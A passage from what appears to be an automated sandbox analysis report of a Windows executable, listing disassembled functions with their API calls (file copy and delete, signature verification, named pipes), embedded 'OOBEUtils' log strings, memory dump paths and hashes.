                                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00401A1C), ref: 00401C99
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00401A1C), ref: 00401D13
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$CloseCreateEventHandleObjectResetServiceSingleStatusThreadWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in DestroyEvent $NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils$SvcInit: Creat thread failed$SvcInit: Create thread successful$SvcInit: Finished$SvcInit: Now wating for the close signal$SvcInit: Started New
                                                                                                                                                                                                                                                                    • API String ID: 2548555128-2125176678
                                                                                                                                                                                                                                                                    • Opcode ID: fdb8e43f0c7796d05782fa09c5a4e7a52c29433dbb338b57c4b152e7f49b068c
                                                                                                                                                                                                                                                                    • Instruction ID: f73ab4652ae81edbc98d7fd2a5d95e0b0f6ab9935acceea9d8e153ccbd849a11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdb8e43f0c7796d05782fa09c5a4e7a52c29433dbb338b57c4b152e7f49b068c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9291D370B80315ABE710DB559D46B5E3BA4EB10B14F14017BF915B73D1EFB8A9008BAE
                                                                                                                                                                                                                                                                    Function 00427320 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,0040674D), ref: 0042732E
                                                                                                                                                                                                                                                                    • PathIsDirectoryW.SHLWAPI(00000000), ref: 00427347
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 0042735A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0042736C
                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00427386
                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00427420
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00427431
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00427456
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004274A6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$ErrorLast$AttributesDeletePath$DirectoryExists
                                                                                                                                                                                                                                                                    • String ID: Failed to delete file: '%s' LastError:%d$File '%s' is with read-only. Its attribute is: '%d'. UnSetting its read-only attr and retry deleting$FileUtils$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2466363971-4107796821
                                                                                                                                                                                                                                                                    • Opcode ID: 00b6d3bf9a951ad68e80268370d137a51b95931526897c450c14d293331eb804
                                                                                                                                                                                                                                                                    • Instruction ID: 1d99e2006965ff6694df6736826d9ecfdb84e75553d3c6a76360acde75f41734
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b6d3bf9a951ad68e80268370d137a51b95931526897c450c14d293331eb804
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3341A530745221EBCA10DF19FD99A5A7B65FB85B01BA40477F80197290DB78BC90CBBD
                                                                                                                                                                                                                                                                    Function 00427AB0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 182encryptionmemoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WinVerifyTrust.WINTRUST(000000FF,?*@`J,?,9E574B25,?,?), ref: 00427B84
                                                                                                                                                                                                                                                                    • WTHelperProvDataFromStateData.WINTRUST(00000000), ref: 00427B95
                                                                                                                                                                                                                                                                    • WTHelperGetProvSignerFromChain.WINTRUST(00000000,00000000,00000000,00000000), ref: 00427BAA
                                                                                                                                                                                                                                                                    • WTHelperGetProvCertFromChain.WINTRUST(00000000,00000000), ref: 00427BCA
                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 00427C07
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000), ref: 00427C22
                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,?), ref: 00427C41
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00427C6A
                                                                                                                                                                                                                                                                    • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00427D07
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CertFromHelperProv$ChainDataLocalNameStringTrustVerify$AllocFreeSignerState
                                                                                                                                                                                                                                                                    • String ID: 4$?*@`J${|}
                                                                                                                                                                                                                                                                    • API String ID: 318076659-843163469
                                                                                                                                                                                                                                                                    • Opcode ID: 2b2f03a0b2219b9638c237f0a50e4636c7e99644d9adfce77a164d3a7e6bd346
                                                                                                                                                                                                                                                                    • Instruction ID: 07a7e49040c28470832a96e5ee50d6d3bb65460ac79225f476d81bb8c7a89be8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b2f03a0b2219b9638c237f0a50e4636c7e99644d9adfce77a164d3a7e6bd346
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69717BB0E00218AFEB14DFA5DD89B9EBBB8FB04314F10416EE515AB281DBB95944CF58
                                                                                                                                                                                                                                                                    Function 0041E190 Relevance: 19.8, APIs: 6, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 0041E231
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041E288
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041E2DC
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0036EE80), ref: 0041E302
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0036EE80), ref: 0041E37D
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000009), ref: 0041F2F9
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Inside initCommBridge, creating pipe %s$OOBEUtils$Pipe already initialized.$Pipe name is empty.$Wrong pipe context passed %i.$\\.\pipe\
                                                                                                                                                                                                                                                                    • API String ID: 2978645861-1085201787
                                                                                                                                                                                                                                                                    • Opcode ID: 2741faf5fde62311bba358750df085c702bd52d97c66e27c1744663fa93f332a
                                                                                                                                                                                                                                                                    • Instruction ID: aaa71bcc0c1ad3f749e7ec319ae41c39833817b2d272478ea5ed4507fdbc246a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2741faf5fde62311bba358750df085c702bd52d97c66e27c1744663fa93f332a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CA10134700300ABDB24DF66DC9AF9A77A8AB05701F14056FE905972D1DB78F990CBAE
                                                                                                                                                                                                                                                                    Function 004274E0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 427fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,9E574B25,?,00000000,?,?,?,00000000,0049994D,000000FF,?,00406D2F), ref: 0042751A
                                                                                                                                                                                                                                                                      • Part of subcall function 004270D0: PathRemoveFileSpecW.SHLWAPI(00000000,?,?,?,?,?,?,00000000,0049994D,000000FF), ref: 0042714C
                                                                                                                                                                                                                                                                      • Part of subcall function 00427260: PathFileExistsW.SHLWAPI(?,?,0040653E), ref: 0042726E
                                                                                                                                                                                                                                                                      • Part of subcall function 00427260: PathIsDirectoryW.SHLWAPI(?), ref: 00427283
                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000,0049994D,000000FF), ref: 004275CB
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0049994D,000000FF), ref: 004275E9
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0049994D,000000FF), ref: 00427637
                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000,0049994D,000000FF), ref: 00427678
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$Path$ErrorExistsLast$AttributesCopyDirectoryRemoveSpec
                                                                                                                                                                                                                                                                    • String ID: Failed to copy file at the destination:'%s'. LastError: %d$FileUtils$OOBEUtils$Source file does not exist in CopyFileFromSourceToDestination
                                                                                                                                                                                                                                                                    • API String ID: 3678581443-2441349454
                                                                                                                                                                                                                                                                    • Opcode ID: 3b2b4e70207e77957e346cfaaefa40b7f30fec250b144c30194b88bdfa61c5ea
                                                                                                                                                                                                                                                                    • Instruction ID: 304be064ac5706b44c2d59a599f2d95f36f10b52853653852536ae88b2003d00
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b2b4e70207e77957e346cfaaefa40b7f30fec250b144c30194b88bdfa61c5ea
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE1F471F002249BCB14DF69ED85BAEB7B5FB45710F50422EE411A7390DB38AD41CBA9
                                                                                                                                                                                                                                                                    Function 0041F360 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 146filesleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F38A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F39F
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,?,?,00000000,?,?,?), ref: 0041F3B6
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000000,?,?,?), ref: 0041F3CC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F3D6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
